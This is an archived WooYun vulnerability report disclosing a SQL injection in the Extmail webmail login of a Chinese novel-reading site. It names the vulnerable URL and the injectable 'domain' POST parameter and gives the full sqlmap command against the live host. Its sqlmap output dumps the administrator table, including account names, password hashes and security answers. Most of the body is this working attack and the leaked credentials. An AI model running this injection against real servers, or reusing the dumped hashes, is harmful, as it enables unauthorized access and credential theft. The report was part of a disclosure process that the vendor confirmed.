当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0212517

漏洞标题:小说阅读网Extmail邮件服务器存在SQL注入漏洞

相关厂商:readnovel.com

漏洞作者: 路人甲

提交时间:2016-05-24 23:17

修复时间:2016-07-09 06:40

公开时间:2016-07-09 06:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-05-24: 细节已通知厂商并且等待厂商处理中
2016-05-25: 厂商已经确认,细节仅向厂商公开
2016-06-04: 细节向核心白帽子及相关领域专家公开
2016-06-14: 细节向普通白帽子公开
2016-06-24: 细节向实习白帽子公开
2016-07-09: 细节向公众公开

简要描述:

小说阅读网Extmail邮件服务器存在SQL注入漏洞

详细说明:

# 服务器
https://mail.readnovel.com
# SQL注入地址
https://mail.readnovel.com/extmail/cgi/index.cgi
# POST,注入参数domain

username=test123&nosameip=on&domain=test123&password=test123&bakecookie=test123


漏洞证明:

python sqlmap.py -u "https://mail.readnovel.com/extmail/cgi/index.cgi" --data "username=test123&nosameip=on&domain=test123&password=test123&bakecookie=test123" -p domain


available databases [2]:
[*] extmail
[*] information_schema


管理员表数据读取

web application technology: Apache
back-end DBMS: MySQL 5.0
[23:15:38] [INFO] fetching columns for table 'manager' in database 'extmail'
[23:15:38] [INFO] the SQL query used returns 11 entries
[23:15:38] [INFO] resumed: username
[23:15:38] [INFO] resumed: varchar(255)
[23:15:38] [INFO] resumed: password
[23:15:38] [INFO] resumed: varchar(255)
[23:15:38] [INFO] resumed: type
[23:15:38] [INFO] resumed: varchar(64)
[23:15:38] [INFO] resumed: uid
[23:15:38] [INFO] resumed: varchar(255)
[23:15:38] [INFO] resumed: name
[23:15:38] [INFO] resumed: varchar(255)
[23:15:38] [INFO] resumed: question
[23:15:38] [INFO] resumed: text
[23:15:38] [INFO] resumed: answer
[23:15:38] [INFO] resumed: text
[23:15:38] [INFO] resumed: disablepwdchange
[23:15:38] [INFO] resumed: smallint(1)
[23:15:38] [INFO] resumed: createdate
[23:15:38] [INFO] resumed: datetime
[23:15:38] [INFO] resumed: expiredate
[23:15:38] [INFO] resumed: date
[23:15:38] [INFO] resumed: active
[23:15:38] [INFO] resumed: tinyint(1)
[23:15:38] [INFO] fetching entries for table 'manager' in database 'extmail'
[23:15:38] [INFO] the SQL query used returns 3 entries
[23:15:38] [INFO] resumed: 1
[23:15:38] [INFO] resumed: 
[23:15:38] [INFO] resumed: 2012-12-03 14:27:45
[23:15:38] [INFO] resumed: 0
[23:15:38] [INFO] resumed: 0000-00-00
[23:15:38] [INFO] resumed: 
[23:15:38] [INFO] resumed: $1$B/zOh4d/$KW8170lIF941W.NTm/JTa/
[23:15:38] [INFO] resumed: 
[23:15:38] [INFO] resumed: postmaster
[23:15:38] [INFO] resumed: 
[23:15:38] [INFO] resumed: [email protected]
[23:15:38] [INFO] resumed: 1
[23:15:38] [INFO] resumed: suekiya
[23:15:38] [INFO] resumed: 2012-03-29 10:57:57
[23:15:38] [INFO] resumed: 0
[23:15:38] [INFO] resumed: 0000-00-00
[23:15:38] [INFO] resumed: 
[23:15:38] [INFO] resumed: *F324523DCFE8D4E4F4F63ED0F9461E36BDE4FDC7
[23:15:38] [INFO] resumed: ć\x88\x91ç\x9a\x84č\x8bąć\x96\x87ĺ\x90\x8d
[23:15:38] [INFO] resumed: postmaster
[23:15:38] [INFO] resumed: 
[23:15:38] [INFO] resumed: [email protected]
[23:15:38] [INFO] resumed: 1
[23:15:38] [INFO] resumed: my answer
[23:15:38] [INFO] resumed: 2007-02-14 15:10:04
[23:15:38] [INFO] resumed: 1
[23:15:38] [INFO] resumed: 0000-00-00
[23:15:38] [INFO] resumed: Super User
[23:15:38] [INFO] resumed: $1$Hat0Dc8B$K1oeust8C5jtVqkgGtKLl.
[23:15:38] [INFO] resumed: my question
[23:15:38] [INFO] resumed: admin
[23:15:38] [INFO] resumed: root
[23:15:38] [INFO] resumed: [email protected]

修复方案:

# 补丁

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-05-25 06:35

厂商回复:

感谢关注小说阅读网!

最新状态:

暂无